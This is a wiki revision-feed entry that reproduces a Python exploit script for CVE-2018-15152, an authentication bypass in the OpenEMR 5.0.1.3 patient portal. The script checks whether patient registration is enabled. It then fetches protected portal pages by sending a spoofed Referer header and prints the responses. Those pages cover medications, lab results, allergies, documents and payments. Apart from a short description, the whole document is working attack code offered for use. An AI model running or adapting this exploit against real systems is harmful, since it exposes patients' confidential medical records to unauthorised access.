https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2018-15152_OpenEMR_5.0.1.3_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E 2026-04-15T02:47:27Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=CVE-2018-15152_OpenEMR_5.0.1.3_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E&diff=5176&oldid=prev 2021-06-16T09:28:53Z

<p>Created page with &quot;&lt;pre&gt; # Exploit Title: OpenEMR 5.0.1.3 - &#039;/portal/account/register.php&#039; Authentication Bypass # Date 15.06.2021 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: ht...&quot;</p> <p><b>New page</b></p><div>&lt;pre&gt;<br /> # Exploit Title: OpenEMR 5.0.1.3 - '/portal/account/register.php' Authentication Bypass<br /> # Date 15.06.2021<br /> # Exploit Author: Ron Jost (Hacker5preme)<br /> # Vendor Homepage: https://www.open-emr.org/<br /> # Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip<br /> # Version: All versions prior to 5.0.1.4<br /> # Tested on: Ubuntu 18.04<br /> # CVE: CVE-2018-15152<br /> # CWE: CWE-287<br /> # Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15152-Exploit<br /> <br /> '''<br /> Description:<br /> An unauthenticated user is able to bypass the Patient Portal Login by simply navigating to<br /> the registration page and modifying the requested url to access the desired page. Some<br /> examples of pages in the portal directory that are accessible after browsing to the<br /> registration page include:<br /> - add_edit_event_user.php<br /> - find_appt_popup_user.php<br /> - get_allergies.php<br /> - get_amendments.php<br /> - get_lab_results.php<br /> - get_medications.php<br /> - get_patient_documents.php<br /> - get_problems.php<br /> - get_profile.php<br /> - portal_payment.php<br /> - messaging/messages.php<br /> - messaging/secure_chat.php<br /> - report/pat_ledger.php<br /> - report/portal_custom_report.php<br /> - report/portal_patient_report.php<br /> Normally, access to these pages requires authentication as a patient. If a user were to visit<br /> any of those pages unauthenticated, they would be redirected to the login page.<br /> '''<br /> <br /> <br /> '''<br /> Import required modules:<br /> '''<br /> import requests<br /> import argparse<br /> <br /> <br /> '''<br /> User-Input:<br /> '''<br /> my_parser = argparse.ArgumentParser(description='OpenEMR Authentication bypass')<br /> my_parser.add_argument('-T', '--IP', type=str)<br /> my_parser.add_argument('-P', '--PORT', type=str)<br /> my_parser.add_argument('-U', '--Openemrpath', type=str)<br /> my_parser.add_argument('-R', '--PathToGet', type=str)<br /> args = my_parser.parse_args()<br /> target_ip = args.IP<br /> target_port = args.PORT<br /> openemr_path = args.Openemrpath<br /> pathtoread = args.PathToGet<br /> <br /> <br /> '''<br /> Check for vulnerability:<br /> '''<br /> # Check, if Registration portal is enabled. If it is not, this exploit can not work<br /> session = requests.Session()<br /> check_vuln_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/portal/account/register.php'<br /> check_vuln = session.get(check_vuln_url).text<br /> print('')<br /> print('[*] Checking vulnerability: ')<br /> print('')<br /> <br /> if &quot;Enter email address to receive registration.&quot; in check_vuln:<br /> print('[+] Host Vulnerable. Proceeding exploit')<br /> else:<br /> print('[-] Host is not Vulnerable: Registration for patients is not enabled')<br /> <br /> '''<br /> Exploit:<br /> '''<br /> header = {<br /> 'Referer': check_vuln_url<br /> }<br /> exploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + pathtoread<br /> Exploit = session.get(exploit_url, headers=header)<br /> print('')<br /> print('[+] Results: ')<br /> print('')<br /> print(Exploit.text)<br /> print('')<br /> &lt;/pre&gt;</div>

Pwnwiki